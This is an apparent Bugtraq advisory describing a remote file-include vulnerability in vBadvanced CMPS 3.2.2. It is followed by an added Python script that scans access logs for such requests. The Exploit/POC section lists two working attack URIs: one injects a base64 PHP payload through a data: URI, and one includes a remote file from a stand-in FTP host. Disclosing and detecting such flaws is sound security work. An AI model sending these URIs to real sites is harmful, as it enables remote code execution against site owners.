vBadvanced CMPS 'vba_cmps_include_bottom.php' Remote File Include Vulnerability
BID:51672
Info
| Bugtraq ID: | 51672 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jan 25 2012 12:00AM |
| Updated: | Jan 25 2012 12:00AM |
| Credit: | PacketiK |
| Vulnerable: | vBadvanced vBadvanced CMPS 3.2.2 |
| Not Vulnerable: | |
Discussion
vBadvanced CMPS is prone to a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to execute arbitrary local and remote scripts in the context of the affected application or obtain potentially sensitive information. This may result in a compromise of the application and the underlying system; other attacks are also possible.
vBadvanced CMPS 3.2.2 is vulnerable; other versions may also be affected.
Exploit / POC
An attacker can exploit this issue with a browser.
The following example URIs are available:
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=data:;base64,PD9waHAgcGhwaW5mbygpO29iX2VuZF9mbHVzaCgpO2V4aXQ7Pz4=
http://www.example.com/vb/includes/vba_cmps_include_bottom.php?pages[pageid]=123&allowview=123&pages[type]=php_file&vba_cusmodid=123&pages[template]=ftp://user:[email protected]/123.txt
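Added example (not part of the original advisory or of vBadvanced's code): a log check for requests of the form shown above, flagging any request to vba_cmps_include_bottom.php whose pages[template] value begins with a URI scheme. It generalizes beyond the data: and ftp:// cases listed to any scheme prefix; the combined log format, the sample log lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter named in the advisory's example URIs.
TARGET_SCRIPT = "vba_cmps_include_bottom.php"
TARGET_PARAM = "pages[template]"

# Assumption: combined-format access log with the request line in quotes.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any URI scheme prefix (data:, ftp://, http://, php://, ...).
SCHEME_RE = re.compile(r"^\s*([a-z][a-z0-9+.\-]*):", re.IGNORECASE)

def wrapper_in_template(uri):
    """Return the scheme if pages[template] on the target script starts
    with a URI scheme, otherwise None."""
    parts = urlsplit(uri)
    if not parts.path.lower().endswith("/" + TARGET_SCRIPT):
        return None
    # parse_qsl percent-decodes names and values, so pages%5Btemplate%5D
    # is matched as well as the literal bracket form.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.strip().lower() == TARGET_PARAM:
            match = SCHEME_RE.match(value)
            if match:
                return match.group(1).lower()
    return None

def scan(lines):
    """Return [(line_number, scheme)] for log lines that match."""
    hits = []
    for number, line in enumerate(lines, 1):
        request = REQUEST_RE.search(line)
        if request:
            scheme = wrapper_in_template(request.group(1))
            if scheme:
                hits.append((number, scheme))
    return hits

# Constructed sample log lines (documentation addresses, placeholder values).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jan/2012:10:00:01 +0000] "GET /vb/includes/vba_cmps_include_bottom.php?pages[type]=php_file&pages[template]=data:;base64,AAAA HTTP/1.1" 200 512',
    '203.0.113.5 - - [25/Jan/2012:10:00:09 +0000] "GET /vb/includes/vba_cmps_include_bottom.php?pages%5Btype%5D=php_file&pages%5Btemplate%5D=ftp%3A%2F%2Ffiles.example.net%2F123.txt HTTP/1.1" 200 498',
    '198.51.100.7 - - [25/Jan/2012:10:01:30 +0000] "GET /vb/includes/vba_cmps_include_bottom.php?pages[template]=sidebar HTTP/1.1" 200 120',
    '198.51.100.7 - - [25/Jan/2012:10:02:11 +0000] "GET /vb/index.php?page=home HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOG):
        print(f"line {number}: pages[template] uses {scheme}: scheme")
```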